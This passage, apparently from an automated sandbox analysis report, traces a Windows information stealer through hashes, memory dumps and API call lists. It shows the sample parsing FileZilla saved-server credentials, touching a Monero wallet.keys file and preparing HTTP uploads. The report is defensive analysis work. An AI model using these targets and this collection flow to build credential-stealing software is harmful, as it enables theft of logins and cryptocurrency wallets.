                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 6lw
                          • API String ID: 0-3761701750
                          • Opcode ID: a9fd1c7c11ac48c6c8b7b5d162177fe379cbc2ef5319d1d8989407f1f561985f
                          • Instruction ID: 7dc4cff1d53ea266acf285ac39b7bb79c31f15829b6482a0c94c1231d3c443dc
                          • Opcode Fuzzy Hash: a9fd1c7c11ac48c6c8b7b5d162177fe379cbc2ef5319d1d8989407f1f561985f
                          • Instruction Fuzzy Hash: 893229F3608200AFE3046E2DED8577AFBE9EF94360F1A493DE6C4C7744E63598058692
                          Function 00D9FD81 Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: QYfw
                          • API String ID: 0-3428747866
                          • Opcode ID: 5dd0e4b5f5223a6f497793574949055427c1ce299db59eb3c3ae51bc169bd30b
                          • Instruction ID: 53c1cd12d8fc0c48f6b9a19efe77e219191ca0654fb42d2a5794579badc210e7
                          • Opcode Fuzzy Hash: 5dd0e4b5f5223a6f497793574949055427c1ce299db59eb3c3ae51bc169bd30b
                          • Instruction Fuzzy Hash: 5F51F4B3A082045FF344AE79DC857BBBBD6EBD4720F1B853DDAC883740E97958058692
                          Function 00E0CFF5 Relevance: .2, Instructions: 191COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b69913e1066b70c74cb02b6ce2ad18c2dbe8029f8ab7d46cee1dcca4c82b5112
                          • Instruction ID: 1eed32b27859dce2fc719fa05327aaac8715d33b636198da0a6f4abacd0c0d98
                          • Opcode Fuzzy Hash: b69913e1066b70c74cb02b6ce2ad18c2dbe8029f8ab7d46cee1dcca4c82b5112
                          • Instruction Fuzzy Hash: 9551E8B3D082149FE3186E2DDC9576AFBD5EB58320F17463CEADA93780E9755C048782
                          Function 00D6879F Relevance: .2, Instructions: 187COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a92cf750991d8126a7cc691d85b94b91ba64bb4ba179861f24e26cf002317e98
                          • Instruction ID: 5c878423a3c1da29505cce677c0c2393b43a113bd6797a7603dc74068a604bb1
                          • Opcode Fuzzy Hash: a92cf750991d8126a7cc691d85b94b91ba64bb4ba179861f24e26cf002317e98
                          • Instruction Fuzzy Hash: DF5104F3B082045FE3146E1DDC8577AB7EADBD4720F2A413DDB8893780E97A6C058296
                          Function 00EA2C70 Relevance: .1, Instructions: 147COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 09abc7859828229a5b8e9cc4da6c7c88713c3c53abf6120adf6ee069a097a33d
                          • Instruction ID: 09b246e148c0d4fe97dec3634bded8f1c988a6d05ca520e7f0d6bff0833a9bc7
                          • Opcode Fuzzy Hash: 09abc7859828229a5b8e9cc4da6c7c88713c3c53abf6120adf6ee069a097a33d
                          • Instruction Fuzzy Hash: FB4113F3B047088BE3006E6DEC8572AF7D5EFD4710F1A853DCA8887380E939A9058286
                          Function 00E9043A Relevance: .1, Instructions: 132COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 13fc3cc5816a108e1d0d835e2ab4ce53ab836de854913dd9a8607700571ecbf9
                          • Instruction ID: 0fbaac979e7e565e888c655a28bf302b56908b686cae9b91c1fb7792c336c283
                          • Opcode Fuzzy Hash: 13fc3cc5816a108e1d0d835e2ab4ce53ab836de854913dd9a8607700571ecbf9
                          • Instruction Fuzzy Hash: 9E4125E3E5831C47E308696CED9837AFAC8C720320F1B023DAF59927C5F8AE0A040284
                          Function 00F257B4 Relevance: .1, Instructions: 130COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cbe70805beff6ff93f03f221ff6005bed463173e8ee5fd789e55e3549958f05d
                          • Instruction ID: f77e0428a59aaaa2d7ce0bd6f347a045e59ec27baf1ff759e258258052934622
                          • Opcode Fuzzy Hash: cbe70805beff6ff93f03f221ff6005bed463173e8ee5fd789e55e3549958f05d
                          • Instruction Fuzzy Hash: FB41F6B354DB38DBC7043E69B994779F7E8EB14B20F36052E99C386340E5B15890B687
                          Function 00B09750 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          Function 00B00250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                            • Part of subcall function 00B08DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B08E0B
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AF99EC
                            • Part of subcall function 00AF99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00AF9A11
                            • Part of subcall function 00AF99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00AF9A31
                            • Part of subcall function 00AF99C0: ReadFile.KERNEL32(000000FF,?,00000000,00AF148F,00000000), ref: 00AF9A5A
                            • Part of subcall function 00AF99C0: LocalFree.KERNEL32(00AF148F), ref: 00AF9A90
                            • Part of subcall function 00AF99C0: CloseHandle.KERNEL32(000000FF), ref: 00AF9A9A
                            • Part of subcall function 00B08E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B08E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00B10DBA,00B10DB7,00B10DB6,00B10DB3), ref: 00B00362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00B00369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00B00385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 00B003CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B003DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00B00419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B00463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B0051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B00532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B0054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00B00562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00B00571
                          • lstrcat.KERNEL32(?,url: ), ref: 00B00580
                          • lstrcat.KERNEL32(?,00000000), ref: 00B00593
                          • lstrcat.KERNEL32(?,00B11678), ref: 00B005A2
                          • lstrcat.KERNEL32(?,00000000), ref: 00B005B5
                          • lstrcat.KERNEL32(?,00B1167C), ref: 00B005C4
                          • lstrcat.KERNEL32(?,login: ), ref: 00B005D3
                          • lstrcat.KERNEL32(?,00000000), ref: 00B005E6
                          • lstrcat.KERNEL32(?,00B11688), ref: 00B005F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00B00604
                          • lstrcat.KERNEL32(?,00000000), ref: 00B00617
                          • lstrcat.KERNEL32(?,00B11698), ref: 00B00626
                          • lstrcat.KERNEL32(?,00B1169C), ref: 00B00635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B10DB2), ref: 00B0068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 7be7e174834585bee15c8e62291a2510cd8bdf2c1025bc3d1c2845f7ed7eaa92
                          • Instruction ID: ffc75a0340393e0db9397704605d6a4bdc580877e6319dbe6670b21d25a48e0c
                          • Opcode Fuzzy Hash: 7be7e174834585bee15c8e62291a2510cd8bdf2c1025bc3d1c2845f7ed7eaa92
                          • Instruction Fuzzy Hash: 1FD12F71A10308ABCB04FBE4DD96EEE7BB8EF54300F508998F502A61D1DF75AA45CB61
                          Function 00AF5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B0A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B0A7E6
                            • Part of subcall function 00AF47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AF4839
                            • Part of subcall function 00AF47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AF4849
                            • Part of subcall function 00B0A740: lstrcpy.KERNEL32(00B10E17,00000000), ref: 00B0A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AF59F8
                          • StrCmpCA.SHLWAPI(?,018AFBE0), ref: 00AF5A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AF5B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,018AFD00,00000000,?,018AE8F0,00000000,?,00B11A1C), ref: 00AF5E71
                          • lstrlen.KERNEL32(00000000), ref: 00AF5E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00AF5E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00AF5E9A
                          • lstrlen.KERNEL32(00000000), ref: 00AF5EAF
                          • lstrlen.KERNEL32(00000000), ref: 00AF5ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AF5EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00AF5F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AF5F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00AF5F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00AF5FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00AF5FBD
                          • HttpOpenRequestA.WININET(00000000,018AFBF0,?,018AF500,00000000,00000000,00400100,00000000), ref: 00AF5BF8
                            • Part of subcall function 00B0A9B0: lstrlen.KERNEL32(?,018A89C8,?,\Monero\wallet.keys,00B10E17), ref: 00B0A9C5
                            • Part of subcall function 00B0A9B0: lstrcpy.KERNEL32(00000000), ref: 00B0AA04
                            • Part of subcall function 00B0A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B0AA12
                            • Part of subcall function 00B0A8A0: lstrcpy.KERNEL32(?,00B10E17), ref: 00B0A905
                            • Part of subcall function 00B0A920: lstrcpy.KERNEL32(00000000,?), ref: 00B0A972
                            • Part of subcall function 00B0A920: lstrcat.KERNEL32(00000000), ref: 00B0A982
                          • InternetCloseHandle.WININET(00000000), ref: 00AF5FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2180733460.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                          • Associated: 00000000.00000002.2180712635.0000000000AF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000BD2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180733460.0000000000D3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000D4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000EC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FD4000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2180915682.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2181799912.0000000000FE3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182346954.0000000001179000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2182459052.000000000117A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
